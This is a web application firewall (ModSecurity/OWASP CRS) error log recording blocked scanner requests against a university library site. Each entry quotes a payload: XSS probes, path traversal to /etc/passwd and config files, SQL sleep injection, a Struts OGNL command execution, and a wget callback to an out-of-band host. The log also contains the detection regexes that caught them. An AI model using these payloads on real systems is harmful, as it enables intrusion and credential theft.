[Tue Aug 29 11:48:56.365033 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAjtdCsAAAAX"]
[Tue Aug 29 11:48:57.424147 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAkwQT4AAAAS"]
[Tue Aug 29 11:48:57.428977 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAmIbKkAAAAo"]
[Tue Aug 29 11:48:57.433938 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAlkwigAAAAO"]
[Tue Aug 29 11:48:58.375389 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14usCo-f0AAAk5CgUAAAAg"]
[Tue Aug 29 11:49:02.369232 2023] [:error] [pid 2382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gribzfw1fwm5ew.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAlOZKkAAAAu"]
[Tue Aug 29 11:49:04.472231 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAjy57QAAAAG"]
[Tue Aug 29 11:49:05.412554 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAkwQU0AAAAS"]
[Tue Aug 29 11:49:08.405080 2023] [:error] [pid 2342] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilib.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAkmTjEAAAAF"]
[Tue Aug 29 11:49:09.400528 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilib.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAk7QMkAAAAi"]
[Tue Aug 29 11:49:09.499964 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xcCo-f0AAAmOBZcAAAAU"]
[Tue Aug 29 11:49:15.395841 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAkksRcAAAAA"]
[Tue Aug 29 11:51:05.349006 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAfWOA8AAAAL"]
[Tue Aug 29 11:51:05.379358 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAknELkAAAAB"]
[Tue Aug 29 11:51:05.395195 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAl4sWkAAAAf"]
[Tue Aug 29 11:51:05.424940 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15OcCo-f0AAAfWOBMAAAAL"]
[Tue Aug 29 11:51:05.672313 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAlIBekAAAAn"]
[Tue Aug 29 11:51:06.066735 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OsCo-f0AAAhoHOgAAAAl"]
[Tue Aug 29 11:51:08.595193 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAknENEAAAAB"]
[Tue Aug 29 11:51:08.615931 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAknENIAAAAB"]
[Tue Aug 29 11:51:09.568136 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAkyyC8AAAAW"]
[Tue Aug 29 11:51:09.576963 2023] [:error] [pid 2490] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAm63KYAAAAD"]
[Tue Aug 29 11:51:10.945672 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAm5BwMAAAAA"]
[Tue Aug 29 11:51:11.566489 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAnGkHkAAAAR"]
[Tue Aug 29 11:51:12.756915 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QMCo-f0AAAm@5v8AAAAH"]
[Tue Aug 29 11:51:12.784613 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAm91mEAAAAG"]
[Tue Aug 29 11:51:13.586799 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAmNp2cAAAAQ"]
[Tue Aug 29 11:51:13.679255 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAnCKyAAAAAK"]
[Tue Aug 29 11:51:14.684038 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAkyyDwAAAAW"]
[Tue Aug 29 11:51:15.668141 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAm5Bw8AAAAA"]
